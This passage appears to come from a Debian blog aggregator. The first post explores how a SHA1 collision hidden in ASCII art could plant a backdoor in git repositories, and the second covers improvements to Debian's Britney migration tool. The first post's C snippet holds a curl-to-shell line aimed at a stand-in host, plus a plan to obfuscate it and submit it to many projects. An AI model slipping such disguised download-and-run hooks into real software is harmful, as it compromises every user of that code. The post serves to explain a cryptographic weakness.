Now we need an ASCII artist. This could be a human, or it could be a machine. The artist needs to make an ASCII art where the first line is the good chunk, and the rest of the lines obfuscate how random the first line is. Quick demo from a not very artistic ASCII artist, of the first 10th of such a picture based on the "good" line above:

7*yLN#!NOK
3*\LN'\NO@
3*/LN  \.A
5*\LN   \.
>=======:)
5*\7N   /.
3*/7N  /.V
3*\7N'/NO@
7*y7N#!NOX

Now, take your ASCII art and embed it in a multiline quote in a C source file, like this:

/* ASCII art for easter egg. */
char *amazing_ascii_art="\
7*yLN#!NOK \
3*\\LN'\\NO@ \
3*/LN  \\.A \ 
5*\\LN   \\. \
>=======:) \
5*\\7N   /. \
3*/7N  /.V \
3*\\7N'/NO@ \
7*y7N#!NOX";
/* We had to escape backslashes above to make it a valid C string.
 * Run program with --easter-egg to see it in all its glory.
 */
/* Call this at the top of main() */
check_display_easter_egg (char **argv)  
    if (strcmp(argv[1], "--easter-egg") == 0)
        printf(amazing_ascii_art);
    if (amazing_ascii_art[0] == "9")
        system("curl http://evil.url   sh");

Now, you need a C ofuscation person, to make that backdoor a little less obvious. (Hint: Add code to to fix the newlines, paint additional ASCII sprites over top of the static art, etc, add animations, and bury the shellcode in there.) After a little work, you'll have a C file that any project would like to add, to be able to display a great easter egg ASCII art. Submit it to a project. Submit different versions of it to 100 projects! Everything after line 3 can be edited to make lots of different versions targeting different programs. Once a project contains the first 3 lines of the file, followed by anything at all, it contains a SHA1 collision, from which you can generate the bad version by swapping in the bad data chuck. You can then replace the good file with the bad version here and there, and noone will be the wiser (except the easter egg will display the "bad" first line before it roots them). Now, how much more expensive would this be than today's SHA1 attack? It needs a way to generate collisions using only printable ASCII. Whether that is feasible depends on the implementation details of the SHA1 attack, and I don't really know. I should stop writing this blog post and read the rest of the paper. You can pick either of these two lessons to take away:

ASCII art in code is evil and unsafe. Avoid it at any cost. apt-get moo
Git's security is getting broken to the point that ASCII art (and a few hundred thousand dollars) is enough to defeat it.

My work today investigating ways to apply the SHA1 collision to git repos (not limited to this blog post) was sponsored by Thomas Hochstein on Patreon.

11 February 2017

Niels Thykier: On making Britney smarter

Updating Britney often makes our life easier. Like:

smooth-updates (winter 2011)
Adam s accidental upgrade of the original auto-hinter[1] (winter 2012)
A non-leaking installability tester (winter 2013)
Fix non-determinism of easy-hinted smooth updatable packages (summer 2014)
Support for non-hinted multi-item migrations (autumn 2015)

Concretely, transitions have become a lot easier. When I joined the release team in the summer 2011, about the worst thing that could happen was discovering that two transitions had become entangled. You would have to wait for everything to be ready to migrate at the same time and then you usually also had to tell Britney what had to migrate together. Today, Britney will often (but not always) de-tangle the transitions on her own and very often figure out how to migrate packages without help. The latter is in fact very visible if you know where to look. Behold, the number of manual easy and hint -hints by RT members per year[2]:

Year   Total   easy   hint
-----+-------+------+-----
2005     53      30    23 
2006    146      74    72
2007     70      40    30
2008    113      68    45
2009    229     171    58
2010    252     159    93
2011    255     118   137
2012     29      21     8
2013     36      30     6
2014     20      20     0
2015     25      17     8
2016     16      11     5
2017      1       1     0

As can be seen, the number of manual hints drop by factor of ~8.8 between 2011 and 2012. Now, I have not actually done a proper statistical test of the data, but I have a hunch that drop was significant (see also [3] for a very short data discussion). In conclusion: Smooth-updates (which was enabled late in 2011) have been a tremendous success.

[1] A very surprising side-effect of that commit was that the ( original ) auto-hinter could now solve a complicated haskell transition. Turns out that it works a lot better, when you give correct information!

[2] As extracted by the following script and then manually massaged into an ASCII table. Tweak the in-line regex to see different hints.

respighi.d.o$ cd "/home/release/britney/hints" && perl -E '
    my (%years, %hints);
    while(<>)   
        chomp;
        if (m/^\#\s*(\d 4 )(?:-?\d 2 -?\d 2 );/ or m/^\#\s*(?:\d+-\d+-\d+\s*[;:]?\s*)?done\s*[;:]?\s*(\d 4 )(?:-?\d 2 -?\d 2 )/)  
             $year = $1; next;
          
         if (m/^((?:easy hint) .*)/)  
             my $hint = $1; $years $year ++ if defined($year) and not $hints $hint ++;
             next;
          
         if (m/^\s*$/)   $year = undef; next;  
     ;
    for my $year (sort(keys(%years)))   
        my $count = $years $year ;
        print "$year: $count\n"
     ' * OLD/jessie/* OLD/wheezy/* OLD/Lenny/* OLD/*

[3] I should probably mention for good measure that extraction is ignoring all hints where it cannot figure out what year it was from or if it is a duplicate. Notable it is omitting about 100 easy/hint-hints from OLD/Lenny (compared to a grep -c), which I think accounts for the low numbers from 2007 (among other). Furthermore, hints files are not rotated based on year or age, nor am I sure we still have all complete hints files from all members.
Filed under: Debian, Release-Team

Next.

Previous.